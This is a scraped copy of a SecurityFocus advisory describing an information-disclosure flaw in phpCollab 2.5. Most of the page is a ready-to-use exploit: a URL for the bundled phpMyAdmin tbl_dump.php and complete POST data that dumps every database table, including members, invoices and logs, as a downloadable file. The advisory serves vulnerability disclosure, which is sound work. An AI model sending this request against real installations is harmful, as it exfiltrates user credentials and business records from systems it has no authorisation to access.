扫码分享
验证:
体验盒子source: https://www.securityfocus.com/bid/53656/info
phpCollab is prone to an information-disclosure vulnerability because it fails to sufficiently validate user-supplied data.
An attacker can exploit this issue to download backup files that contain sensitive information. Information harvested may aid in launching further attacks.
phpCollab 2.5 is vulnerable; other versions may also be affected.
http://www.example.com/phpcollab/includes/phpmyadmin/tbl_dump.php
POST DATA:
table_select%5B%5D=assignments&table_select%5B%5D=bookmarks&table_select%5B
%5D=bookmarks_categories&table_select%5B%5D=calendar&table_select%5B%5D=fil
es&table_select%5B%5D=invoices&table_select%5B%5D=invoices_items&table_sele
ct%5B%5D=logs&table_select%5B%5D=members&table_select%5B%5D=newsdeskcomment
s&table_select%5B%5D=newsdeskposts&table_select%5B%5D=notes&table_select%5B
%5D=notifications&table_select%5B%5D=organizations&table_select%5B%5D=phase
s&table_select%5B%5D=posts&table_select%5B%5D=projects&table_select%5B%5D=r
eports&table_select%5B%5D=services&table_select%5B%5D=sorting&table_select%
5B%5D=subtasks&table_select%5B%5D=support_posts&table_select%5B%5D=support_
requests&table_select%5B%5D=tasks&table_select%5B%5D=teams&table_select%5B%
5D=topics&table_select%5B%5D=updates&what=data&drop=1&asfile=sendit&server=
1&lang=en&db=phpcollab
体验盒子
